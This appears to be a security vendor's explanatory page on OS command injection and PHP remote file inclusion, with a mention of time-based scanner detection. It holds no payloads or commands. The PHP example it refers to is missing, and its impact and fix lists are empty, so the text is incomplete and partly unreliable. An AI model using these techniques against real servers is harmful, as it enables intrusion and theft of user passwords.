OS command injection is a vulnerability by which an attacker can execute OS commands through the web applications on a web server. The attacker inputs operating system commands through a web interface in order to execute OS commands. Web interfaces that are not properly sanitised are usually subjected to this exploitation. The attacker will get the ability to execute OS commands in the shell of the server. The attacker will be able to load malicious programs and can even access passwords of end users. This vulnerability can be fixed by emphasizing security during the initial design and development of web applications. An attacker can execute any malicious bash commands on the system. The attacker runs OS commands and has the output captured by the web application and return the result to the attacker. The commands can include everything from simple
ping commands to map the internal network. By injecting OS commands and by measuring the amount of time to execute, our scanner can detect whether the injection is time-based OS command injection or any other injection. If the result proves that the site is vulnerable to blind OS command injection using timing attacks, it will be due to improper input sanitisation.
In the below-given PHP example, if the path passed to “include” statements are not properly sanitised, the code will look for scripts that will accept the filename as input.
If the path is extracted from an HTTP request and if no input validation is done (for example, by checking the input against a whitelist), this snippet of code will result in remote file inclusion.
In this case, the remote file included in the URL will be executed by the server.
The impact include:-
This vulnerability can be fixed by:-